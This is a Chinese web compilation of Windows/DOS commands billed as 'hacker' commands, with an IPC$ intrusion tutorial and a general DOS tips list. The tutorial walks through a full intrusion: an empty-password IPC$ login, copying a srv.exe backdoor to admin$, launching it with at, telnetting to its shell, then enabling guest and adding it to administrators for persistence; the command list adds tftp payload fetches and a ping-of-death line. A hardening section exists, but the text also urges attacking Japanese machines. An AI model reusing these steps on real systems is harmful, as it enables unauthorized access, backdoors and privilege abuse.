黑客常有的dos命令
黑客常用DOS命令:
net use $"\\ip\ipc$Content$nbsp;" " /user:" " 建立IPC空链接
net use $"\\ip\ipc$Content$nbsp;"密码" /user:"用户名" 建立IPC非空链接
net use h: $"\\ip\c$Content$nbsp;"密码" /user:"用户名" 直接登陆后映射对方C:到本地为H:
net use h: $"\\ip\c$Content$nbsp;登陆后映射对方C:到本地为H:
net use $"\\ip\ipc$Content$nbsp;/del 删除IPC链接
net use h: /del 删除映射对方到本地的为H:的映射
net user 用户名 密码 /add 建立用户
net user guest /active:yes 激活guest用户
net user 查看有哪些用户
net user 帐户名 查看帐户的属性
net localgroup administrators 用户名 /add 把“用户”添加到管理员中使其具有管理员权限,注意:administrator后加s用复数
net start 查看开启了哪些服务
net start 服务名 开启服务;(如:net start telnet, net start schedule)
net stop 服务名 停止某服务
net time \\目标ip 查看对方时间
net time \\目标ip /set 设置本地计算机时间与“目标IP”主机的时间同步,加上参数/yes可取消确认信息
net view 查看本地局域网内开启了哪些共享
net view \\ip 查看对方局域网内开启了哪些共享
net config 显示系统 *** 设置
net logoff 断开连接的共享
net pause 服务名 暂停某服务
net send ip "文本信息" 向对方发信息
net ver 局域网内正在使用的 *** 连接类型和信息
net share 查看本地开启的共享
net share ipc$Content$nbsp;开启ipc$共享
net share ipc$Content$nbsp;/del 删除ipc$共享
net share c$Content$nbsp;/del 删除C:共享
net user guest 12345 用guest用户登陆后用将密码改为12345
net password 密码 更改系统登陆密码
netstat -a 查看开启了哪些端口,常用netstat -an
netstat -n 查看端口的 *** 连接情况,常用netstat -an
netstat -v 查看正在进行的工作
netstat -p 协议名 例:netstat -p tcq/ip 查看某协议使用情况(查看tcp/ip协议使用情况)
netstat -s 查看正在使用的所有协议使用情况
nbtstat -A ip 对方136到139其中一个端口开了的话,就可查看对方最近登陆的用户名(03前的为用户名)-注意:参数-A要大写
tracert -参数 ip(或计算机名) 跟踪路由(数据包),参数:“-w数字”用于设置超时间隔。
ping ip(或域名) 向对方主机发送默认大小为32字节的数据,参数:“-l[空格]数据包大小”;“-n发送数据次数”;“-t”指一直ping。
ping -t -l 65550 ip 死亡之ping(发送大于64K的文件并一直ping就成了死亡之ping)
ipconfig (winipcfg) 用于windows NT及XP(windows 95 98)查看本地ip地址,ipconfig可用参数“/all”显示全部配置信息
tlist -t 以树行列表显示进程(为系统的附加工具,默认是没有安装的,在安装目录的Support/tools文件夹内)
kill -F 进程名 加-F参数后强制结束某进程(为系统的附加工具,默认是没有安装的,在安装目录的Support/tools文件夹内)
del -F 文件名加-F参数后就可删除只读文件,/AR、/AH、/AS、/AA分别表示删除只读、隐藏、系统、存档文件,/A-R、/A-H、/A-S、/A-A表示删除除只读、隐藏、系统、存档以外的文件。例如“DEL/AR *.*”表示删除当前目录下所有只读文件,“DEL/A-S *.*”表示删除当前目录下除系统文件以外的所有文件
del /S /Q 目录 或用:rmdir /s /Q 目录 /S删除目录及目录下的所有子目录和文件。同时使用参数/Q 可取消删除操作时的系统确认就直接删除。(二个命令作用相同)
move 盘符\路径\要移动的文件名 存放移动文件的路径\移动后文件名 移动文件,用参数/y将取消确认移动目录存在相同文件的提示就直接覆盖
fc one.txt two.txt 3st.txt 对比二个文件并把不同之处输出到3st.txt文件中," "和" " 是重定向命令
at id号 开启已注册的某个计划任务
at /delete 停止所有计划任务,用参数/yes则不需要确认就直接停止
at id号 /delete 停止某个已注册的计划任务
at 查看所有的计划任务
at \\ip time 程序名(或一个命令) /r 在某时间运行对方某程序并重新启动计算机
finger username @host 查看最近有哪些用户登陆
telnet ip 端口 远和登陆服务器,默认端口为23
open ip 连接到IP(属telnet登陆后的命令)
telnet 在本机上直接键入telnet 将进入本机的telnet
copy 路径\文件名1 路径\文件名2 /y 复制文件1到指定的目录为文件2,用参数/y就同时取消确认你要改写一份现存目录文件
copy c:\srv.exe $"\\ip\admin$Content$nbsp;复制本地c:\srv.exe到对方的admin下
cppy 1st.jpg/b+2st.txt/a 3st.jpg 将2st.txt的内容藏身到1st.jpg中生成3st.jpg新的文件,注:2st.txt文件头要空三排,参数:/b指二进制文件,/a指ASCLL格式文件
copy $\svv.exe"\\ip\admin$\svv.exe c:\ 或:copy\\ip\admin$\*.* 复制对方admini$共享下的srv.exe文件(所有文件)至本地C:
xcopy 要复制的文件或目录树 目标地址\目录名 复制文件和目录树,用参数/Y将不提示覆盖相同文件
tftp -i 自己IP(用肉机作跳板时这用肉机IP) get server.exe c:\server.exe 登陆后,将“IP”的server.exe下载到目标主机c:\server.exe 参数:-i指以二进制模式传送,如传送exe文件时用,如不加-i 则以ASCII模式(传送文本文件模式)进行传送
tftp -i 对方IP put c:\server.exe 登陆后,上传本地c:\server.exe至主机
ftp ip 端口 用于上传文件至服务器或进行文件操作,默认端口为21。bin指用二进制方式传送(可执行文件进);默认为ASCII格式传送(文本文件时)
route print 显示出IP路由,将主要显示 *** 地址Network addres,子网掩码Netmask,网关地址Gateway addres,接口地址Interface
arp 查看和处理ARP缓存,ARP是名字解析的意思,负责把一个IP解析成一个物理性的MAC地址。arp -a将显示出全部信息
start 程序名或命令 /max 或/min 新开一个新窗口并更大化(最小化)运行某程序或命令
mem 查看cpu使用情况
attrib 文件名(目录名) 查看某文件(目录)的属性
attrib 文件名 -A -R -S -H 或 +A +R +S +H 去掉(添加)某文件的 存档,只读,系统,隐藏 属性;用+则是添加为某属性
dir 查看文件,参数:/Q显示文件及目录属系统哪个用户,/T:C显示文件创建时间,/T:A显示文件上次被访问时间,/T:W上次被修改时间
date /t 、 time /t 使用此参数即“DATE/T”、“TIME/T”将只显示当前日期和时间,而不必输入新日期和时间
set 指定环境变量名称=要指派给变量的字符 设置环境变量
set 显示当前所有的环境变量
set p(或其它字符) 显示出当前以字符p(或其它字符)开头的所有环境变量
pause 暂停批处理程序,并显示出:请按任意键继续....
if 在批处理程序中执行条件处理(更多说明见if命令及变量)
goto 标签 将cmd.exe导向到批处理程序中带标签的行(标签必须单独一行,且以冒号打头,例如:“:start”标签)
call 路径\批处理文件名 从批处理程序中调用另一个批处理程序 (更多说明见call /?)
for 对一组文件中的每一个文件执行某个特定命令(更多说明见for命令及变量)
echo on或off 打开或关闭echo,仅用echo不加参数则显示当前echo设置
echo 信息 在屏幕上显示出信息
echo 信息 pass.txt 将"信息"保存到pass.txt文件中
findstr "Hello" aa.txt 在aa.txt文件中寻找字符串hello
find 文件名 查找某文件
title 标题名字 更改CMD窗口标题名字
color 颜色值 设置cmd控制台前景和背景颜色;0=黑、1=蓝、2=绿、3=浅绿、4=红、5=紫、6=黄、7=白、8=灰、9=淡蓝、A=淡绿、B=淡浅绿、C=淡红、D=淡紫、E=淡黄、F=亮白
prompt 名称 更改cmd.exe的显示的命令提示符(把C:\、D:\统一改为:EntSky\ )
print 文件名 打印文本文件
ver 在DOS窗口下显示版本信息
winver 弹出一个窗口显示版本信息(内存大小、系统版本、补丁版本、计算机名)
format 盘符 /FS:类型 格式化磁盘,类型:FAT、FAT32、NTFS ,例:Format D: /FS:NTFS
md 目录名 创建目录
replace 源文件 要替换文件的目录 替换文件
ren 原文件名 新文件名 重命名文件名
tree 以树形结构显示出目录,用参数-f 将列出第个文件夹中文件名称
type 文件名 显示文本文件的内容
more 文件名 逐屏显示输出文件
doskey 要锁定的命令=字符
doskey 要解锁命令= 为DOS提供的锁定命令(编辑命令行,重新调用win2k命令,并创建宏)。如:锁定dir命令:doskey dir=entsky (不能用doskey dir=dir);解锁:
doskey dir= taskmgr 调出任务管理器 chkdsk /F D: 检查磁盘D并显示状态报告;加参数/f并修复磁盘上的错误 tlntadmn telnt服务admn,键入tlntadmn选择3,再选择8,就可以更改telnet服务默认端口23为其它任何端口 exit 退出cmd.exe程序或目前,用参数/B则是退出当前批处理脚本而不是cmd.exe path 路径\可执行文件的文件名为可执行文件设置一个路径。 cmd 启动一个win2K命令解释窗口。参数:/eff、/en 关闭、开启命令扩展;更我详细说明见cmd /? regedit /s 注册表文件名 导入注册表;参数/S指安静模式导入,无任何提示; regedit /e 注册表文件名 导出注册表 cacls 文件名 参数 显示或修改文件访问控制列表(ACL)——针对NTFS格式时。参数:/D 用户名:设定拒绝某用户访问;/P 用户名:perm 替换指定用户的访问权限;/G 用户名:perm 赋予指定用户访问权限;Perm 可以是: N 无,R 读取, W 写入, C 更改(写入),F 完全控制;例:cacls D:\test.txt /D pub 设定d:\test.txt拒绝pub用户访问。 cacls 文件名 查看文件的访问用户权限列表 REM 文本内容 在批处理文件中添加注解 netsh 查看或更改本地 *** 配置情况 IIS服务命令: iisreset /reboot 重启win2k计算机(但有提示系统将重启信息出现) iisreset /start或stop 启动(停止)所有Internet服务 iisreset /restart 停止然后重新启动所有Internet服务 iisreset /status 显示所有Internet服务状态 iisreset /enable或disable 在本地系统上启用(禁用)Internet服务的重新启动 iisreset /rebootonerror 当启动、停止或重新启动Internet服务时,若发生错误将重新开机 iisreset /noforce 若无法停止Internet服务,将不会强制终止Internet服务 iisreset /timeout Val在到达逾时间(秒)时,仍未停止Internet服务,若指定/rebootonerror参数,则电脑将会重新开机。预设值为重新启动20秒,停止60秒,重新开机0秒。 FTP 命令: (后面有详细说明内容) ftp的命令行格式为: ftp -v -d -i -n -g[主机名] -v 显示远程服务器的所有响应信息。 -d 使用调试方式。 -n 限制ftp的自动登录,即不使用.netrc文件。 -g 取消全局文件名。 help [命令] 或 ?[命令] 查看命令说明 bye 或 quit 终止主机FTP进程,并退出FTP管理方式. pwd 列出当前远端主机目录 put 或 send 本地文件名 [上传到主机上的文件名] 将本地一个文件传送至远端主机中 get 或 recv [远程主机文件名] [下载到本地后的文件名] 从远端主机中传送至本地主机中 mget [remote-files] 从远端主机接收一批文件至本地主机 mput local-files 将本地主机中一批文件传送至远端主机 dir 或 ls [remote-directory] [local-file] 列出当前远端主机目录中的文件.如果有本地文件,就将结果写至本地文件 ascii 设定以ASCII方式传送文件(缺省值) bin 或 image 设定以二进制方式传送文件 bell 每完成一次文件传送,报警提示 cdup 返回上一级目录 close 中断与远程服务器的ftp会话(与open对应) open host[port] 建立指定ftp服务器连接,可指定连接端口 delete 删除远端主机中的文件 mdelete [remote-files] 删除一批文件
黑客经常用的DOS命令都有什么?
1:NET
只要你拥有某IP的用户名和密码,那就用IPC$做连接吧
2:at
一般一个入侵者入侵后都会留下后门,也就是种木马了,你把木马传了上去,么启动他呢?
那么需要用AT命令
3:telnet
这个命令非常实用,它可以与远方做连接,不过正常下需要密码、用户,不过你给对方种了木马,直接连到这个木马打开的端口.
4:FTP
它可以将你的东西传到对方机子上
5:copy
下面我说说怎样把本地的文件复制到对方硬盘上去,需要建立好IPC$连接才有效。
这几个算是最经常用的
编程 DOS命令 黑客
nc.exe是一个程序,系统不自带,需要下载。你百度搜索一下,下载后把nc.exe防在系统文件夹(C:\Windows\System32)里就可以用了。
黑客DOS命令或其它命令入侵他人电脑的具体步骤?
IPC$入侵
一 唠叨一下:
网上关于ipc$入侵的文章可谓多如牛毛,而且也不乏优秀之作,攻击步骤甚至可以说已经成为经典的模式,因此也没人愿意再把这已经成为定式的东西拿出来摆弄.
不过话虽这样说,但我个人认为这些文章讲解的并不详细,对于之一次接触ipc$的菜鸟来说,简单的罗列步骤并不能解答他们的许多迷惑(你随便找一个hack论坛搜一下ipc,看存在的疑惑有多少).
因此我写了这篇相当于解惑的教程.想把一些容易混淆,容易迷惑人的问题说清楚,让大家不要总徘徊在原地!如果你看完这篇帖子仍有疑问,请马上回复!
二 什么是ipc$
IPC$(Internet Process Connection)是共享"命名管道"的资源(大家都是这么说的),它是为了让进程间通信而开放的命名管道,可以通过验证用户名和密码获得相应的权限,在远程管理计算机和查看计算机的共享资源时使用。
利用IPC$,连接者甚至可以与目标主机建立一个空的连接而无需用户名与密码(当然,对方机器必须开了ipc$共享,否则你是连接不上的),而利用这个空的连接,连接者还可以得到目标主机上的用户列表(不过负责的管理员会禁止导出用户列表的)。
我们总在说ipc$漏洞ipc$漏洞,其实,ipc$并不是真正意义上的漏洞,它是为了方便管理员的远程管理而开放的远程 *** 登陆功能,而且还打开了默认共享,即所有的逻辑盘(c$,d$,e$……)和系统目录winnt或windows(admin$)。
所有的这些,初衷都是为了方便管理员的管理,但好的初衷并不一定有好的收效,一些别有用心者(到底是什么用心?我也不知道,代词一个)会利用IPC$,访问共享资源,导出用户列表,并使用一些字典工具,进行密码探测,寄希望于获得更高的权限,从而达到不可告人的目的.
解惑:
1)IPC连接是Windows NT及以上系统中特有的远程 *** 登陆功能,其功能相当于Unix中的Telnet,由于IPC$功能需要用到Windows NT中的很多DLL函数,所以不能在Windows 9.x中运行。
也就是说只有nt/2000/xp才可以建立ipc$连接,98/me是不能建立ipc$连接的(但有些朋友说在98下能建立空的连接,不知道是真是假,不过现在都2003年了,建议98的同志换一下系统吧,98不爽的)
2)即使是空连接也不是100%都能建立成功,如果对方关闭了ipc$共享,你仍然无法建立连接
3)并不是说建立了ipc$连接就可以查看对方的用户列表,因为管理员可以禁止导出用户列表
三 建立ipc$连接在hack攻击中的作用
就像上面所说的,即使你建立了一个空的连接,你也可以获得不少的信息(而这些信息往往是入侵中必不可少的),访问部分共享,如果你能够以某一个具有一定权限的用户身份登陆的话,那么你就会得到相应的权限,显然,如果你以管理员身份登陆,嘿嘿,就不用我在多说了吧,what u want,u can do!!
(基本上可以总结为获取目标信息、管理目标进程和服务,上传木马并运行,如果是2000server,还可以考虑开启终端服务方便控制.怎么样?够厉害吧!)
不过你也不要高兴的太早,因为管理员的密码不是那么好搞到的,虽然会有一些傻傻的管理员用空口令或者弱智密码,但这毕竟是少数,而且现在不比从前了,随着人们安全意识的提高,管理员们也愈加小心了,得到管理员密码会越来越难的:(
因此今后你更大的可能就是以极小的权限甚至是没有权限进行连接,你会慢慢的发现ipc$连接并不是万能的,甚至在主机不开启ipc$共享时,你根本就无法连接.
所以我认为,你不要把ipc$入侵当作终极武器,不要认为它战无不胜,它就像是足球场上射门前的传球,很少会有致命一击的效果,但却是不可缺少的,我觉得这才是ipc$连接在hack入侵中的意义所在.
四 ipc$与空连接,139,445端口,默认共享的关系
以上四者的关系可能是菜鸟很困惑的一个问题,不过大部分文章都没有进行特别的说明,其实我理解的也不是很透彻,都是在与大家交流中总结出来的.(一个有良好讨论氛围的BBS可以说是菜鸟的天堂)
1)ipc$与空连接:
不需要用户名与密码的ipc$连接即为空连接,一旦你以某个用户或管理员的身份登陆(即以特定的用户名和密码进行ipc$连接),自然就不能叫做空连接了.
许多人可能要问了,既然可以空连接,那我以后就空连接好了,为什么还要费九牛二虎之力去扫描弱口令,呵呵,原因前面提到过,当你以空连接登陆时,你没有任何权限(很郁闷吧),而你以用户或管理员的身份登陆时,你就会有相应的权限(有权限谁不想呀,所以还是老老实实扫吧,不要偷懒哟).
2)ipc$与139,445端口:
ipc$连接可以实现远程登陆及对默认共享的访问;而139端口的开启表示netbios协议的应用,我们可以通过139,445(win2000)端口实现对共享文件/打印机的访问,因此一般来讲,ipc$连接是需要139或445端口来支持的.
3)ipc$与默认共享
默认共享是为了方便管理员远程管理而默认开启的共享(你当然可以关闭它),即所有的逻辑盘(c$,d$,e$……)和系统目录winnt或windows(admin$),我们通过ipc$连接可以实现对这些默认共享的访问(前提是对方没有关闭这些默认共享)
五 ipc$连接失败的原因
以下5个原因是比较常见的:
1)你的系统不是NT或以上操作系统;
2)对方没有打开ipc$默认共享
3)对方未开启139或445端口(惑被防火墙屏蔽)
4)你的命令输入有误(比如缺少了空格等)
5)用户名或密码错误(空连接当然无所谓了)
另外,你也可以根据返回的错误号分析原因:
错误号5,拒绝访问 : 很可能你使用的用户不是管理员权限的,先提升权限;
错误号51,Windows 无法找到 *** 路径 : *** 有问题;
错误号53,找不到 *** 路径 : ip地址错误;目标未开机;目标lanmanserver服务未启动;目标有防火墙(端口过滤);
错误号67,找不到 *** 名 : 你的lanmanworkstation服务未启动;目标删除了ipc$;
错误号1219,提供的凭据与已存在的凭据集冲突 : 你已经和对方建立了一个ipc$,请删除再连。
错误号1326,未知的用户名或错误密码 : 原因很明显了;
错误号1792,试图登录,但是 *** 登录服务没有启动 : 目标NetLogon服务未启动。(连接域控会出现此情况)
错误号2242,此用户的密码已经过期 : 目标有帐号策略,强制定期要求更改密码。
关于ipc$连不上的问题比较复杂,除了以上的原因,还会有其他一些不确定因素,在此本人无法详细而确定的说明,就靠大家自己体会和试验了.
六 如何打开目标的IPC$(此段引自相关文章)
首先你需要获得一个不依赖于ipc$的shell,比如sql的cmd扩展、telnet、木马,当然,这shell必须是admin权限的,然后你可以使用shell执行命令 net share ipc$ 来开放目标的ipc$。从上面可以知道,ipc$能否使用还有很多条件。请确认相关服务都已运行,没有就启动它(不知道怎么做的请看net命令的用法),还是不行的话(比如有防火墙,杀不了)建议放弃。
七 如何防范ipc$入侵
1禁止空连接进行枚举(此操作并不能阻止空连接的建立,引自《解剖win2000下的空会话》)
首先运行regedit,找到如下组建[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA]把RestrictAnonymous = DWORD的键值改为:00000001(如果设置为2的话,有一些问题会发生,比如一些WIN的服务出现问题等等)
2禁止默认共享
1)察看本地共享资源
运行-cmd-输入net share
2)删除共享(每次输入一个)
net share ipc$ /delete
net share admin$ /delete
net share c$ /delete
net share d$ /delete(如果有e,f,……可以继续删除)
3)停止server服务
net stop server /y (重新启动后server服务会重新开启)
4)修改注册表
运行-regedit
server版:找到如下主键[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters]把AutoShareServer(DWORD)的键值改为:00000000。
pro版:找到如下主键[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters]把AutoShareWks(DWORD)的键值改为:00000000。
如果上面所说的主键不存在,就新建(右击-新建-双字节值)一个主健再改键值。
3永久关闭ipc$和默认共享依赖的服务:lanmanserver即server服务
控制面板-管理工具-服务-找到server服务(右击)-属性-常规-启动类型-已禁用
4安装防火墙(选中相关设置),或者端口过滤(滤掉139,445等),或者用新版本的优化大师
5设置复杂密码,防止通过ipc$穷举密码
(本教程不定期更新,欲获得最新版本,请登陆官方网站:菜菜鸟社区原创http://ccbirds.yeah.net)
八 相关命令
1)建立空连接:
net use \\IP\ipc$ "" /user:"" (一定要注意:这一行命令中包含了3个空格)
2)建立非空连接:
net use \\IP\ipc$ "用户名" /user:"密码" (同样有3个空格)
3)映射默认共享:
net use z: \\IP\c$ "密码" /user:"用户名" (即可将对方的c盘映射为自己的z盘,其他盘类推)
如果已经和目标建立了ipc$,则可以直接用IP+盘符+$访问,具体命令 net use z: \\IP\c$
4)删除一个ipc$连接
net use \\IP\ipc$ /del
5)删除共享映射
net use c: /del 删除映射的c盘,其他盘类推
net use * /del 删除全部,会有提示要求按y确认
九 经典入侵模式
这个入侵模式太经典了,大部分ipc教程都有介绍,我也就拿过来引用了,在此感谢原创作者!(不知道是哪位前辈)
1. C:\net use \\127.0.0.1\IPC$ "" /user:"admintitrators"
这是用《流光》扫到的用户名是administrators,密码为"空"的IP地址(空口令?哇,运气好到家了),如果是打算攻击的话,就可以用这样的命令来与127.0.0.1建立一个连接,因为密码为"空",所以之一个引号处就不用输入,后面一个双引号里的是用户名,输入administrators,命令即可成功完成。
2. C:\copy srv.exe \\127.0.0.1\admin$
先复制srv.exe上去,在流光的Tools目录下就有(这里的$是指admin用户的c:\winnt\system32\,大家还可以使用c$、d$,意思是C盘与D盘,这看你要复制到什么地方去了)。
3. C:\net time \\127.0.0.1
查查时间,发现127.0.0.1 的当前时间是 2002/3/19 上午 11:00,命令成功完成。
4. C:\at \\127.0.0.1 11:05 srv.exe
用at命令启动srv.exe吧(这里设置的时间要比主机时间快,不然你怎么启动啊,呵呵!)
5. C:\net time \\127.0.0.1
再查查到时间没有?如果127.0.0.1 的当前时间是 2002/3/19 上午 11:05,那就准备开始下面的命令。
6. C:\telnet 127.0.0.1 99
这里会用到Telnet命令吧,注意端口是99。Telnet默认的是23端口,但是我们使用的是SRV在对方计算机中为我们建立一个99端口的Shell。
虽然我们可以Telnet上去了,但是SRV是一次性的,下次登录还要再激活!所以我们打算建立一个Telnet服务!这就要用到ntlm了
7.C:\copy ntlm.exe \\127.0.0.1\admin$
用Copy命令把ntlm.exe上传到主机上(ntlm.exe也是在《流光》的Tools目录中)。
8. C:\WINNT\system32ntlm
输入ntlm启动(这里的C:\WINNT\system32指的是对方计算机,运行ntlm其实是让这个程序在对方计算机上运行)。当出现"DONE"的时候,就说明已经启动正常。然后使用"net start telnet"来开启Telnet服务!
9. Telnet 127.0.0.1,接着输入用户名与密码就进入对方了,操作就像在DOS上操作一样简单!(然后你想做什么?想做什么就做什么吧,哈哈)
为了以防万一,我们再把guest激活加到管理组
10. C:\net user guest /active:yes
将对方的Guest用户激活
11. C:\net user guest 1234
将Guest的密码改为1234,或者你要设定的密码
12. C:\net localgroup administrators guest /add
将Guest变为Administrator^_^(如果管理员密码更改,guest帐号没改变的话,下次我们可以用guest再次访问这台计算机)
十 总结:
关于ipc入侵就说这么多了,觉得已经够详细了,如果有不准确的地方,希望能与大家讨论.
最后,希望大家不要随便入侵,我写这篇文章的目的是想解答大家的疑惑,并不是鼓励大家随便的入侵,如果你非想试一下,建议拿小日本的机子开练(什么?为什么?因为我讨厌日本,没别的)
我想要一份网易学院的”黑客必学dos命令“能发给我一份么 谢谢
这是我从网上找的DOS技巧100例,希望对你有用
1、*.*的简写
*.*可以用.代替,例如,删除当前目录中的全部文件∶
DEL.
2、返回父目录即上级目录
CD..
3、把目录文件的列表存入文本文件中
DIRfilename
4、查看当前目录下任何属性的文件
*** 一∶DIR
*** 二∶DIR/A
5、取消当前目录下所有文件的所有属性(实际上只能查看属性而不能取消-jm注)
ATTRIB,
若在C盘根目录下执行此命令,再用DIR来查看,可以看到IO.SYS、MSDOS.SYS等隐含文件
6、显示当前目录下的所有子目录名
DIR/AD
7、连续显示多个文件的内容
COPY *.* CON
8、分屏显示文件内容
*** 一∶MOREfilename
*** 二∶TYPE filename|more
9、改变磁盘文件的注册时间
*** 一∶COPY filename+NUL
*** 二∶COPY filename+,,
10、如何屏蔽DOS行的输出信息?
*** 是将屏幕输出重定向到DOS空设备NUL,例如∶
COPY MYPROG.EXE A:NUL
11、在DOS状态下直接显示用D方式编辑的WPS文件内容
COPY filename.wps CON/B
12、向文本文件中追加数据
*** 一∶COPY filename+CON
*** 二∶TYPE CONfilename
输入完毕后按F6或Ctrl+Z键结束。
13、键盘指法练习或汉字输入练习的简易屏幕
COPY CON NUL
14、直接打印键盘输入的内容
*** 一∶COPY CON PRN
*** 二∶MOREPRN
*** 三∶SORTPRN
输入完毕后按F6或Ctrl+Z键。
15、DOS下直接编辑生成文件
在没有任何编辑软件(如EDLIN、EDIT等)的情况下,可临时用以下六种 *** 从键盘编辑生成文件,当文件内容输入完毕后,按F6键
或按Ctrl+Z键存盘退出∶
*** 一∶COPY CON filename
*** 二∶TYPE CONfilename
*** 三∶MOREfilename
*** 四∶SORTfilename
*** 五∶FIND"XXX"/V/Nfilename
*** 六∶SORT|FIND"XXX"/V/Nfilename
*** 四、五、六均有特殊用处,读者不妨一试。
16、零字节文件的生成
*** ∶TYPE NULfilename
上述 *** 常用于处理需保密的磁盘文件,起到删除文件内容的作用,内容被删除后一般不可恢复。
17、对零字节文件的拷贝,不能用COPY命令,只能用XCOPY命令。
例如∶XCOPY filename1 filename2
18、目录中的所有文件和子目录的复制
XCOPY 目录名.驱动器号:/S
19、如何正确使用COPY 和XCOPY命令?
●将若干个文件联结成一个文件时,应使用COPY命令。
●拷贝小于64KB的单个文件,使用COPY命令。拷贝大于64KB的文件,应使用XCOPY命令。
●拷贝多个文件应使用XCOPY命令。
●拷贝子目录中的内容,应使用XCOPY/S命令。拷贝一批文件到软盘,应使用XCOPY/M命令。
20、什么时候用XCOPY命令的/D开关项?
有时候需要从某个目录中"选出"从某一天开始建立或修改过的文件,并将它们备份,此时可使用XCOPY/D命令。例如,下述命令可
以把C∶目录下那些在1996年7月1日以后建立或修改过的文件拷贝到A盘∶
XCOPY C:*.* A:/D:07-01-96
21、单软驱复制软盘
有的PC机只装有一个软驱,这个驱动器既当A盘又当B盘使用,如果要在这样的系统上进行软盘复制,使用下述的XCOPY 命令∶
XCOPY A: B:
22.整理软盘中碎块,提高使用效率
一张软盘经过多次建立和删除文件操作后,某些文件记录会以不连续的形式存放在软盘空间中,造成软盘空间产生许多碎块,影
响软盘的读写操作性能,严重时可导致读写故障。
解决以上问题可使用COPY命令进行整盘拷贝,则新盘上的文件保持连续存放。
23.将多个文件连续拷入多张软盘。
首先,用ATTRIB命令设置每一文件的文档特性∶
ATTRIB+A *.*/S
然后使用XCOPY命令,在软盘装满后插入新盘,根据文档特性决定哪些文件需要拷贝,哪些不拷。
XCOPY *.* A∶/S/M/W
24.使用TYPE命令"拷贝"文件
拷贝文件通常使用COPY命令或XCOPY命令,其实,TYPE也有"拷贝"文件的用途∶
TYPE filenamelfilename2
这种 *** 对于拷贝隐含文件非常有效。例如∶TYPE IO.SYSA∶IO.SYS
25.以小写方式显示文件或目录
DIR/L
26.只显示文件名与子目录名,不显示文件大小和生成时间等信息
DIR/B
27.使DIR总是按文件名的字母顺序来显示文件
在AUTOEXEC BAT中加入下述命令即可∶
SET DIRCMD=/O
28.列当天创建的文件目录
若想知道当天(如1996年10月21日)建立了多少文件,可用下述命令列出∶
DIR|FIND"10 21 1996"
29.若不希望别人使用DIR命令进行目录文件列表,有什么 *** 呢?
*** 一∶DOSKEY DIR=You can not use DIR!
*** 二∶在AUTOEXEC BAT中加入命令行∶SET DIRCMD=0
此命令的功能是在用DIR命令来显示文件时,只显示"File not found",能起到暂时保密的作用。若想显示文件及目录,只有指
定具体的文件名或路径。
*** 三∶SET DIRCMD=DIRNUL
此命令执行后再使用DIR命令,将输出没有文件的信息,也颇具迷惑性。
30.出所有目录中的文件
CHKDSK/V|MORE
31.如何在有多级目录的磁盘上查找文件
*** 一∶CHKDSK/V|FIND"文件名"其中文件名必须用大写字母。
*** 二∶DIR/S文件名
32.实时控制打印机的换行或换页
ECHO+PRN(换行)
ECHO^LPRN(换页)
33.使计算机在DOS命令行发出声音
ECHO ^G
34.DOS命令提问的自动响应
例如∶
ECHO Y|DEL C∶
ECHO N|CHKDSK C∶/F
35.使ECHO命令显示空行
ECHO命令后直接跟空格字符时,ECHO将显示当前的信息回显状态(ON或OFF),而不直接向屏幕回显空行。其实,下面一些非常简
单的命令格式都能使ECHO命令显示空行∶
ECHO ECHO, ECHO; ECHO+
ECHO[ ECHO] ECHO/ ECHO\par
36.用ECHO命令向交互式DOS命令馈送回车符
例如∶
ECHO+|DATE|FIND"Current date"
ECHO+|TIME|FIND"Current time"
此技巧可用于AUTOEXEC.BAT中,使每次开机后直接显示当前日期和时间信息,不必按回车键就能继续下去。
37.开机时间黑匣子
有时需要记录每次使用计算机的日期和时间,以便加强用机管理。可以利用上述技巧,只须在AUTOEXEC.BAT文件中加入下列命令
∶
ECHO+|DATEABC
ECHO+|TIMEABC
这样在每次启动计算机后,文件ABC中就自动记录了日期和时间,执行命令TYPE ABC即可查看以往开机日期和时间。
38.自动统计命令或文件的运行时间
下面给出一个计时器TIMETEST.BAT,实现了自动统计命令或文件的运行时间∶
@ECHO OFF
TIME 0
COMMAND /C %1 %2 %3 %4
ECHO %1 %2 %3 %4运行时间为∶
ECHO+|TIME|FIND"time is"
@ECHO ON
例如,测试AUTOEXEC.BAT运行时间∶
CTIMETEST AUTOEXEC.BAT ┆
AUTOEXEC.BAT运行时间为∶
Current time is 0∶00∶03 49
说明AUTOEXEC.BAT运行了3.49秒。
39.跳过或单步执行CONFIG.SYS和AUTOEXEC.BAT文件
*** 一∶启动计算机,屏幕出现Starting MS-DOS…时,按F5键或SHIFT键,DOS便会跳过CONFIG.SYS和AUTOEXEC.BAT两文件,用
系统运行的基本环境配置来启动机器。
*** 二∶当出现上面的提示后,按F8键,并通过键盘逐一回答Y或N来选择执行命令。
*** 三∶在CONFIG.SYS文件的命令中加上"?"号。如DOS?=UMS,这样在执行到该条命令时,便会出现[Y,N]?的选择提示,让你选
择是否装入该命令。
40.能否省去DOS启动时等待按F8或F5的两秒时间?
能。 *** 是在CONFIG SYS文件的头部加上语句SWITCHES=/F,此后同样可以实现以前的功能, *** 是在未出现"Starting MS-DOS
…"时就按下F8或F5键。
41.单步执行批处理文件
COMMAND/Y/C(批处理文件名)
开关/Y告诉DOS在执行每一行前暂停,提示[Y,N]?询问用户是否执行。
42.快速获取DOS命令的帮助信息
*** 一∶FAST HELP 命令名
*** 二∶命令名/?
*** 三∶命令名/H
43.方便地更改子目录名
以下MOVE命令能将C∶目录改名为C∶∶
MOVE C∶ C∶
44.什么时候使用MOVE命令移动文件?
MOVE命令的更大特点是可以在一个命令行里列出多个要移的文件,文件之间可用","号相隔。例如,将当前目录中所有可执行文
件均移进目录中∶
MOVE *.COM,*.EXE,*.BAT
45.用MOVE命令对子目录进行简单加密或解密
加密∶如将C∶目录利用半个汉字进行简单加密,可执行命令∶
MOVE C∶ C(半个汉字字符)
解密∶反之,可用MOVE命令结合通配符*或?,将不可识别的目录名改成其它名字,达到解密目的。
46.快速进入深层子目录
可用SUBST命令设置驱动器标识符,取代深层次子目录路径,使得进入深层次子目录十分方便。例如,下述命令可以将子目录C∶
模拟成M盘∶
SUBST M∶ C∶
这样,在任何目录下,只要将当前驱动器变成M,即可进入PRG子目录。
47.如何取消SUBST设置的盘符?
例如,要取消上例中的M盘,只须执行命令SUBST M∶/D即可。
48.建立并进入新目录的MD命令
DOS中的MD命令只能建立子目录,建好后再用CD命令进入,其实可以用∶
DOSKEY MD=MD $1 $T CD $1
